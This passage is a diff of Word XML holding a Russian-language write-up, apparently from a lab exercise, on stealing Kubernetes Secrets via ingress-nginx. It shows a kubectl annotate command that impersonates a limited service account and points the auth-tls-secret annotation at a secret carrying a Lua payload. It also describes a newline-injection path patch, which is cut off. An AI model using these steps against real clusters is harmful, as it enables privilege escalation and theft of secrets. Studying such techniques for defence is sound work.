+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Конфиг </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">обычного пользователя с правами на </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Далее было проверено, что этот пользователь не может читать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>напрямую.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78519544" wp14:editId="24DB734E">
+            <wp:extent cx="6480175" cy="410845"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
+            <wp:docPr id="807246235" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="807246235" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId18"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="410845"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Обычный пользователь не может читать </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+      </w:pPr>
+      <w:r>
+        <w:t>практическая реализация</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Для начала реализации необходимо написать скрипт на </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">который будет перенесен в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> и который скопромитирует данные </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1CC0C455" wp14:editId="09A47CF1">
+            <wp:extent cx="6480175" cy="464820"/>
+            <wp:effectExtent l="0" t="0" r="0" b="0"/>
+            <wp:docPr id="2083322315" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="2083322315" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId19"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="464820"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Lua</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">скрипт для компрометации </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Secret</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Далее от имени </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">атакующего </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">пользователя был создан секрет, в котором </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">должен создасться </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SSL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">сертификат вместе с ключом в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>namespace</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">приложения, но файлы создания </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SSL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">сертификата: </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ca</w:t>
+      </w:r>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>crt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>crt</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>key</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">были подменены на вышеупомянутый </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>скрипт</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="08EC5B32" wp14:editId="1CBDA3C2">
+            <wp:extent cx="6480175" cy="454025"/>
+            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
+            <wp:docPr id="305197534" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="305197534" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId20"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="454025"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Создание секрета с </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">скриптом в </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>SSL</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:t>сертификате</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">Затем от имени атакующего пользователя была созданна аннотация для </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:t>, отвечающая за 2-е приложение:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> annotate ingress auth-app-two-ingress -n app \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx.ingress.kubernetes.io/auth-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-secret="default/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>lua</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>payload-secret" \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--overwrite \</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="0"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>--as=</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>system:serviceaccount</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>:</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>app:limited</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-user</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>В</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>данном</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>запросе</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>в</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>конфигурацию</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>auth</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>app</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>two</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>была</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>добавлена</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>важная</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>аннотация</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>ingress</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubernetes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>io</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>auth</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>tls</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>secret</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>которая</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>указывает</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>на</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>путь</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>где</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>лежит</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>сертификат</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:t>что</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>заставит</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>nginx</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>-</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve">controller </w:t>
+      </w:r>
+      <w:r>
+        <w:t>скачать</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:t>его</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>.</w:t>
+      </w:r>
+    </w:p>
+    <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="a"/>
+      </w:pPr>
+      <w:r>
+        <w:lastRenderedPageBreak/>
+        <w:drawing>
+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413E5B39" wp14:editId="7FD49308">
+            <wp:extent cx="6480175" cy="2448560"/>
+            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
+            <wp:docPr id="1027708896" name="Picture 1"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="1027708896" name=""/>
+                    <pic:cNvPicPr/>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId21"/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr>
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="6480175" cy="2448560"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="-"/>
+        <w:ind w:left="0" w:firstLine="426"/>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:t xml:space="preserve">Создание аннотации, а также </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">проверка ее наличия в действующем </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>Ingress</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t xml:space="preserve">В конце необходимо </w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve">создать патч на изменение пути, в котором инъекция </w:t>
+      </w:r>
+      <w:r>
+        <w:t>\</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>n</w:t>
+      </w:r>
+      <w:r>
+        <w:t>:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:lang w:val="en-US"/>
+        </w:rPr>
+        <w:t>kubectl</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
